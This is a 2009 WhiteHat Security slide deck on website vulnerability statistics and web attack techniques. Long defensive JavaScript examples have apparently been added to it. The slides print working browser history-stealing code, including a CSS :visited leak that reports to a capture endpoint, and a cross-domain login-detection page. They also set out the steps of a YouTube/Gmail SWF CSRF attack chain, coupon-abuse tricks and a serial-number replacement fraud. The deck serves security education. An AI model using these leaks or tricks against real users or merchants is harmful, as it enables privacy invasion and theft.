Web Application Vulnerability Analysis
SANS What Works, 06.02.2009
Jeremiah Grossman, Founder & Chief Technology Officer
© 2009 WhiteHat, Inc. | Page
Jeremiah Grossman
• WhiteHat Security Founder & CTO
• Technology R&D and industry evangelist (InfoWorld's CTO Top 25 for 2007)
• Frequent international conference speaker
• Co-founder of the Web Application Security Consortium
• Co-author: Cross-Site Scripting Attacks
• Former Yahoo! information security officer
WhiteHat Security - Website Risk Management
• WhiteHat Sentinel Service
• Unlimited website vulnerability assessment
• SaaS-based, annual subscription model
• Proprietary scanning technology and expert operations team
• 200+ enterprise customers
• 1000's of assessments performed annually, from start-ups to Fortune 500
Sentinel PE - Configured assessment delivery including comprehensive manual testing for business logic issues. For high-risk websites that hold sensitive data and perform critical business functions.
Sentinel SE - Configured assessment delivery with verified vulnerability reporting – designed for medium-risk websites with complex functionality requiring extensive configuration.
Sentinel BE - Self-service, automated assessment delivery with verified vulnerability reporting – designed for smaller, less complex, lower-risk websites.
Data Set
• Collection duration: January 1, 2006 to March 31, 2009
• Total websites: 1,031
• Identified vulnerabilities (custom web applications): 17,888
• Assessment frequency: ~Weekly
• Vulnerability classes: WASC Threat Classification
• Severity naming convention: PCI-DSS
Key Findings
• Unresolved vulnerabilities: 7,157 (60% resolution rate)
• Websites having had at least one HIGH, CRITICAL, or URGENT issue: 82%
• Lifetime average number of vulnerabilities per website: 17
• Websites currently with at least one HIGH, CRITICAL, or URGENT issue: 63%
• Current average of unresolved vulnerabilities per website: 7
[Chart: Percentage likelihood of a website having a vulnerability by severity: URGENT, HIGH, CRITICAL]
WhiteHat Security Top Ten
[Chart: Percentage likelihood of a website having a vulnerability by class]
1. Cross-Site Scripting
2. Information Leakage
3. Content Spoofing
4. Insufficient Authorization
5. SQL Injection
6. Predictable Resource Location
7. Session Fixation
8. Cross-Site Request Forgery
9. Insufficient Authentication
10. HTTP Response Splitting
• Average number of inputs per website: 227
• Average ratio of vulnerability count / number of inputs: 2.58%
Time-to-Fix (Days) - WhiteHat Top Ten
Best-case scenario: Not all vulnerabilities have been fixed...
[Chart: time-to-fix in days for each of the Top Ten classes: Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, SQL Injection, Predictable Resource Location, Session Fixation, Cross-Site Request Forgery, Insufficient Authentication, HTTP Response Splitting]
Resolution rate - Top 5 by Severity

Class of Attack                 % resolved   Severity
Cross-Site Scripting            20%          urgent
Insufficient Authorization      19%          urgent
SQL Injection                   30%          urgent
HTTP Response Splitting         75%          urgent
Directory Traversal             53%          urgent
Insufficient Authentication     38%          critical
Cross-Site Scripting            39%          critical
Abuse of Functionality          28%          critical
Cross-Site Request Forgery      45%          critical
Session Fixation                21%          critical
Brute Force                     11%          high
Content Spoofing                25%          high
HTTP Response Splitting         30%          high
Information Leakage             29%          high
Predictable Resource Location   26%          high
Intranet Hacking
Attacks can penetrate the intranet by controlling/hijacking a user's browser and using JavaScript malware, which is on the inside of the network.
History Stealing Using Java and CSS
    // l is an <a> element whose href is the URL being tested (created earlier, not shown on the slide)
    document.body.appendChild(l);
    var c = document.defaultView.getComputedStyle(l, null).getPropertyValue("color");
    document.body.removeChild(l);
    // check for visited
    if (c == "rgb(0, 0, 255)") {
        // visited
    } else {
        // not visited
    }
    // end visited check
Cycles through thousands of URLs checking the link color.
Common intranet hostnames make good targets as well...
    <html>
    <style>
    #links a:visited { color: #ff00ff; }
    #links a:visited#link1 { background: url('/capture.cgi?login.yahoo.com'); }
    #links a:visited#link2 { background: url('/capture.cgi?mail.google.com'); }
    #links a:visited#link3 { background: url('/capture.cgi?mail.yahoo.com'); }
    </style>
    <body>
    <ul id="links">
    <li><a id="link1" href="http://login.yahoo.com/">http://login.yahoo.com/</a></li>
    <li><a id="link2" href="http://mail.google.com/">http://mail.google.com/</a></li>
    <li><a id="link3" href="http://mail.yahoo.com/">http://mail.yahoo.com/</a></li>
    </ul>
    </body>
    </html>
Cycle through the same URLs, NoScript won’t help.
[Slide shows an excerpt of http://ha.ckers.org/fierce/hosts.txt, the Fierce hostname wordlist, with common intranet names such as mail, intranet, HR, exchange and router highlighted]
Login Detection via Authenticated CSS
Perform a cross-domain load of a stylesheet, then read property values using standard JavaScript APIs. What makes it work on so many sites is that browsers will load inline style definitions from HTML documents. In addition, stylesheet properties differ wildly depending on whether a user is logged in or not.
    <html>
    <head>
    <link rel="stylesheet" href="http://home.myspace.com/index.cfm?fuseaction=user"/>
    <script>
    function func() {
        var ele = document.getElementById('blah');
        alert(window.getComputedStyle(ele, null).getPropertyValue('margin-bottom'));
    }
    </script>
    </head>
    <body onload="func()">
    <div id="blah" class="show"></div>
    </body>
    </html>
http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html
Insecure Content Ownership
A content ownership issue taking advantage of flimsy security controls on both the server side and the client side.
GIFAR
Appending a Java applet (in the form of a JAR) to the end of another file type commonly allowed in web application file uploads, such as images, Word documents, audio/video files, just about anything.
http://riosec.com/how-to-create-a-gifar
http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/
http://blogs.zdnet.com/security/?p=1619
[Diagram: one file that is GIF data from the front and JAR data from the back]
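A server-side check for the GIFAR pattern, added here as an example and not taken from the slides or the posts linked above: it walks the GIF block structure to find where the image legitimately ends and refuses any upload with bytes past the trailer, calling out the case where that tail carries a ZIP end-of-central-directory record (the structure a JAR loader searches for from the end of the file). The GIF and ZIP samples are constructed and are not a working applet.

```javascript
// Added example (not from the slides): reject GIF uploads that also carry a ZIP/JAR
// archive (the GIFAR polyglot). ZIP readers, the Java runtime included, locate an
// archive from the end-of-central-directory record near the end of the file, so a
// JAR appended after a valid GIF still loads as a JAR. A GIF ends with a single
// trailer byte 0x3B; anything after it is a red flag.

const GIF_HEADERS = ['GIF87a', 'GIF89a'];
const EOCD_SIG = Buffer.from([0x50, 0x4b, 0x05, 0x06]); // "PK\x05\x06"
const MAX_EOCD_SEARCH = 22 + 65535; // EOCD record plus the maximum ZIP comment length

// Skip a chain of GIF data sub-blocks (length byte + data, terminated by a 0 length).
function skipSubBlocks(buf, pos) {
  while (pos < buf.length) {
    const len = buf[pos];
    pos += 1 + len;
    if (len === 0) return pos;
  }
  return -1;
}

// Walk the GIF structure: header(6) + logical screen descriptor(7) [+ global color
// table], then extension/image blocks until the trailer 0x3B. Returns the offset
// just past the trailer, or -1 if the structure is malformed or never terminates.
function gifEndOffset(buf) {
  if (buf.length < 13 || !GIF_HEADERS.includes(buf.toString('latin1', 0, 6))) return -1;
  let pos = 13;
  const packed = buf[10];
  if (packed & 0x80) pos += 3 * (1 << ((packed & 0x07) + 1)); // global color table
  while (pos >= 0 && pos < buf.length) {
    const b = buf[pos];
    if (b === 0x3b) return pos + 1;                  // trailer: image ends here
    if (b === 0x21) {                                 // extension: introducer + label
      pos = skipSubBlocks(buf, pos + 2);
    } else if (b === 0x2c) {                          // image descriptor (10 bytes)
      pos += 10;
      const p = buf[pos - 1];
      if (p & 0x80) pos += 3 * (1 << ((p & 0x07) + 1)); // local color table
      pos = skipSubBlocks(buf, pos + 1);              // +1 for LZW minimum code size
    } else {
      return -1;
    }
  }
  return -1;
}

// Validation result for an upload declared as image/gif.
function checkGifUpload(buf) {
  const end = gifEndOffset(buf);
  if (end < 0) return { ok: false, reason: 'not a well-formed GIF' };
  if (end !== buf.length) {
    const tail = buf.subarray(Math.max(0, buf.length - MAX_EOCD_SEARCH));
    const hasZip = tail.indexOf(EOCD_SIG) !== -1;
    return {
      ok: false,
      reason: hasZip ? 'ZIP/JAR archive appended after GIF trailer' : 'trailing data after GIF trailer',
    };
  }
  return { ok: true, reason: 'clean' };
}

// Constructed samples: a minimal 1x1 GIF with no image data, and the same GIF with a
// minimal (empty) ZIP end-of-central-directory record appended. Neither is a real JAR.
const CLEAN_GIF = Buffer.concat([
  Buffer.from('GIF89a', 'latin1'),
  Buffer.from([0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00]), // 1x1, no global color table
  Buffer.from([0x3b]),                                     // trailer
]);
const GIFAR_SAMPLE = Buffer.concat([CLEAN_GIF, EOCD_SIG, Buffer.alloc(18)]);
```

Rejecting on "any data after the trailer" is the load-bearing rule; the EOCD signature is only there to make the report specific. A malformed or truncated image is rejected too, since an upload that a strict parser cannot finish should never be stored as an image.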
Gmail, YouTube, Flash, and CSRF, Oh my!
http://www.youtube.com/crossdomain.xml
    <cross-domain-policy>
    <allow-access-from domain="*.youtube.com"/>
    <allow-access-from domain="*.ytimg.com"/>
    <allow-access-from domain="*.google.com"/>
    </cross-domain-policy>
http://jeremiahgrossman.blogspot.com/2008/09/i-used-to-know-what-you-watched-on.html
I know what you watch
1) Attacker emails a special SWF to a Gmail account they control and locates the attachment download URL on google.com.
2) A logged-in YouTube user visits an attacker-controlled page.
3) Attacker forces the victim to authenticate to the attacker's Gmail account (identity misbinding / CSRF).
4) Attacker embeds the SWF from the Gmail account into the web page.
5) Attacker now has read/write access on YouTube.com as the victim's account.
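The entry that makes step 1 work is `*.google.com`: the attachment download URL is on a google.com host, so a SWF fetched from there falls inside YouTube's policy. The script below is an added example, not code from the slides or from WhiteHat, that audits a crossdomain.xml policy for exactly that overlap. The policy text is the YouTube one shown above; the list of hosts that serve user-uploaded content is a constructed assumption, and wildcard patterns are treated as matching the base domain plus all subdomains, as the Adobe policy-file specification describes.

```javascript
// Added example (not from the slides): audit a Flash crossdomain.xml policy for
// allow-access-from patterns that also cover hosts serving attacker-uploadable
// content, plus the two classic mistakes (domain="*" and secure="false").

const YOUTUBE_POLICY = `<cross-domain-policy>
<allow-access-from domain="*.youtube.com"/>
<allow-access-from domain="*.ytimg.com"/>
<allow-access-from domain="*.google.com"/>
</cross-domain-policy>`;

// Hosts under the same operator that serve files uploaded by arbitrary users
// (constructed assumption for the demo; the slide only says "on google.com").
const USER_CONTENT_HOSTS = ['mail.google.com', 'docs.google.com'];

// Extract every allow-access-from element's domain pattern and secure flag.
// A missing secure attribute is treated as secure (the default for a policy
// served over HTTPS); secure="false" opens the policy to http:// origins.
function parsePolicy(xml) {
  const entries = [];
  const re = /<allow-access-from\b([^>]*)\/?>/g;
  let m;
  while ((m = re.exec(xml)) !== null) {
    const attrs = m[1];
    const dm = attrs.match(/\bdomain="([^"]*)"/);
    if (!dm) continue;
    entries.push({ domain: dm[1], secure: !/\bsecure="false"/.test(attrs) });
  }
  return entries;
}

// Does a policy pattern match a host? "*" matches everything; "*.example.com"
// matches example.com and every subdomain; anything else is an exact host.
function patternMatches(pattern, host) {
  if (pattern === '*') return true;
  if (pattern.startsWith('*.')) {
    const base = pattern.slice(2);
    return host === base || host.endsWith('.' + base);
  }
  return pattern === host;
}

// Findings: each one names the offending pattern and why it is a problem.
function auditPolicy(xml, userContentHosts) {
  const findings = [];
  for (const { domain, secure } of parsePolicy(xml)) {
    if (domain === '*') findings.push({ domain, issue: 'allows every origin' });
    if (!secure) findings.push({ domain, issue: 'secure="false" permits http origins' });
    for (const host of userContentHosts) {
      if (patternMatches(domain, host)) {
        findings.push({ domain, issue: 'covers user-content host ' + host });
      }
    }
  }
  return findings;
}
```

Run against the policy above, `auditPolicy(YOUTUBE_POLICY, USER_CONTENT_HOSTS)` reports the `*.google.com` entry once per user-content host it covers and nothing for the two YouTube-owned patterns. The mitigation the audit points at is the one YouTube applied: name only the specific hosts that need cross-domain access instead of a wildcard over a domain that also hosts user content.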
Flash Parameter Injection (Top Ten Web Hacking Techniques, 2008)
Flash Parameter Injection introduces a new way to inject values into the global parameters of Flash movies while the movie is embedded in its original HTML environment. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. This can lead to more elaborate attacks that take advantage of the interaction between the Flash movie and the HTML page in which it is embedded.
How it works
There are several different FPI variants. Most of them involve tricking the server into sending back a page where user input is interpreted as Flash parameters. This allows an attacker to inject malicious global parameters into the Flash movie and exploit Flash-specific vulnerabilities.
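The "user input interpreted as Flash parameters" step can be shown with a query-string model of flashvars. The code below is an added example, not from the slides or from the original FPI paper: a naive concatenation beside an encoded builder, with a simplified parser standing in for how the runtime turns the string into movie globals. The parameter names, the embed markup and the injected string are constructed.

```javascript
// Added example (not from the slides): reflected input becoming an injected Flash
// global, and the encoding that prevents it. Flash parses flashvars as a URL query
// string, so an unencoded "&" inside a value starts a new parameter.

// Vulnerable pattern: a user-supplied value is concatenated straight into flashvars.
function buildFlashvarsUnsafe(username) {
  return 'user=' + username + '&theme=blue';
}

// Hardened pattern: every name and value is URL-encoded, so "&", "=" and "%" in
// user input stay inside the parameter they were meant for.
function buildFlashvars(params) {
  return Object.entries(params)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(String(v)))
    .join('&');
}

// Second, independent layer: the flashvars string sits inside a double-quoted HTML
// attribute, so it must also be attribute-escaped (embed markup is assumed).
function embedTag(swfUrl, flashvars) {
  const esc = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');
  return '<embed src="' + esc(swfUrl) + '" flashvars="' + esc(flashvars) + '">';
}

// Simplified model of how the runtime populates movie globals from flashvars
// (a plain query-string parse; a later duplicate overwrites an earlier one).
function parseFlashvars(str) {
  const globals = {};
  for (const part of str.split('&')) {
    if (part === '') continue;
    const i = part.indexOf('=');
    const k = i < 0 ? part : part.slice(0, i);
    const v = i < 0 ? '' : part.slice(i + 1);
    globals[decodeURIComponent(k)] = decodeURIComponent(v);
  }
  return globals;
}

const INJECTED = 'alice&isAdmin=true'; // constructed input that tries to add a second global

// The unsafe builder lets the input define isAdmin; the encoded builder keeps the
// whole string as the value of "user" and nothing else.
function demo() {
  return {
    unsafe: parseFlashvars(buildFlashvarsUnsafe(INJECTED)),
    safe: parseFlashvars(buildFlashvars({ user: INJECTED, theme: 'blue' })),
  };
}
```

The same rule applies to the other variants on the following slides: whether the parameters arrive through the movie URL's query string, the flashvars attribute or a DOM write, each value needs URL encoding for the flashvars layer and attribute or JavaScript-string escaping for the layer that carries it.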
[Figure: ActionScript 2 code reading a global variable]
[Figure: Passing arguments in an embedded URI]
[Figure: Passing arguments using 'flashvars']
[Figure: DOM-based Flash parameter injection]
[Figure: Persistent Flash Parameter Injection]
Promo codes for cheapskates
Online advertising campaigns distribute coupon and promo codes redeemable for discounts and other freebies. Some codes are more valuable than others.
• X% and $X off sales
• Free Shipping
• 2 for 1 Specials
• Add-Ons & Upgrades
MacWorld Hacker VIP
Client-Side Hacking: Back-to-Back Free MacWorld Platinum Pass ($1,695)
http://grutztopia.jingojango.net/2007/01/your-free-macworld-expo-platinum-pass_11.html
http://grutztopia.jingojango.net/2008/01/another-free-macworld-platinum-pass-yes.html
http://grutztopia.jingojango.net/2008/02/your-client-side-security-sucks.html
Free Pizza Tastes Better
March 31, 2009...
1. Go to the Domino's Pizza site.
2. Order a medium one-topping pizza.
3. Enter coupon code "BAILOUT". FREE!
Still have to go pick it up!
Share the Knowledge
11,000 x $7.00 = $70,000
http://consumerist.com/5193012/dominos-accidentally-gives-away-11000-pizzas-in-bailout-promotion
http://news.cnet.com/8301-13845_3-10207986-58.html
http://offtopics.com/sales-coupons-promo-codes/1797-free-papa-johns-pizza-coupon-code-hack.html
"Spoke to a Domino's rep, who told me the free-pizza code was created internally for a promotion that was never actually green-lit."
Oops!
Other Tricks
• Guess / Brute Force (No CAPTCHAs)
• Stacking Multiple Codes
• Delete Cookies (Don't Forget Flash)
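All three tricks work because the limits are enforced in the wrong place (or not at all). The service below is an added example, not from the slides: redemption state is keyed to the authenticated account and the code rather than to a cookie, invalid guesses are budgeted per account in place of the missing CAPTCHA, and an order carries at most one code. Codes, accounts, limits and the clock are constructed.

```javascript
// Added example (not from the slides): coupon redemption that closes the three
// tricks above. Keying state to the account means clearing cookies (HTTP or Flash
// LSO) resets nothing; a per-account budget of invalid codes blunts guessing; and
// one code per order rules out stacking.

const MAX_INVALID_GUESSES = 5; // per account, before redemption is locked

class CouponService {
  constructor(codes) {
    // code -> { discount (fraction), maxUses, uses, validUntil (ms since epoch) }
    this.codes = new Map(Object.entries(codes));
    this.invalidByAccount = new Map(); // account -> number of invalid codes submitted
    this.redeemed = new Set();          // "account|code" pairs already used
  }

  // Try to apply a code to an order. Returns { ok, reason, discount? }.
  // Unknown, expired and exhausted codes all get the same answer so the response
  // does not tell a guesser which kind of code it hit.
  redeem(accountId, order, code, now) {
    if (order.couponApplied) return { ok: false, reason: 'one code per order' };
    const invalid = this.invalidByAccount.get(accountId) || 0;
    if (invalid >= MAX_INVALID_GUESSES) return { ok: false, reason: 'too many invalid codes' };

    const normalized = code.trim().toUpperCase();
    const entry = this.codes.get(normalized);
    const usable = entry !== undefined && now <= entry.validUntil && entry.uses < entry.maxUses;
    if (!usable) {
      this.invalidByAccount.set(accountId, invalid + 1);
      return { ok: false, reason: 'invalid or expired code' };
    }
    const key = accountId + '|' + normalized;
    if (this.redeemed.has(key)) return { ok: false, reason: 'already redeemed by this account' };

    entry.uses += 1;
    this.redeemed.add(key);
    order.couponApplied = normalized;
    return { ok: true, reason: 'applied', discount: entry.discount };
  }
}

// Constructed catalogue: a live 20%-off code, and a draft free-item code that was
// never approved for release, so its allowed use count is zero.
const NOW = Date.UTC(2009, 2, 31); // 31 March 2009, the date on the slide
function makeDemoService() {
  return new CouponService({
    SPRING20: { discount: 0.20, maxUses: 1000, uses: 0, validUntil: NOW + 7 * 86400e3 },
    FREEPIE:  { discount: 1.00, maxUses: 0,    uses: 0, validUntil: NOW + 7 * 86400e3 },
  });
}
```

The guess budget only helps if codes are not guessable in the first place; short dictionary words like the one on the previous slide would fall inside five tries from a few accounts, so codes meant for public campaigns need enough random characters that a locked account is the expected outcome of guessing, not the exception.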
iCan fix you iPod
Sometimes electronics break or are defective and customers would like to return the item. Online systems are designed to facilitate this process.
Nicholas Arthur Woodhams, 23, from Kalamazoo, Michigan, sets up shop online to repair iPods.
Abuse Apple's Advance Replacement Program by guessing iPod serial numbers, backed with Visa-branded gift cards ($1 pre-auth).
Repeat the process 9,075 times, resell the "replacements" at heavily discounted prices ($49), and deny any Apple credit charges.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9130136&intsrc=news_ts_head
http://www.macworld.com/article/139522/23yearold_michigan_man_busted_for_ipod_fraud.html
http://www.appleinsider.com/articles/08/06/26/apple_makes_example_of_ipod_repairman_in_lawsuit.html
http://launderingmoney.blogspot.com/2009/03/money-laundering-charges-for-kalamazoo.html
Charged with trademark infringement, fraud, and money laundering.
Scams that scale
“Federal prosecutors have asked U.S. District Court Judge Robert Bell to let them seize real estate and personal property -- including a 2004 Audi and a 2006 drag racer -- as well as more than $571,000 in cash belonging to Woodhams, all alleged to be proceeds from his scam.”
Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: jeremiah@whitehatsec.com
WhiteHat Security
http://www.whitehatsec.com/
Thank You!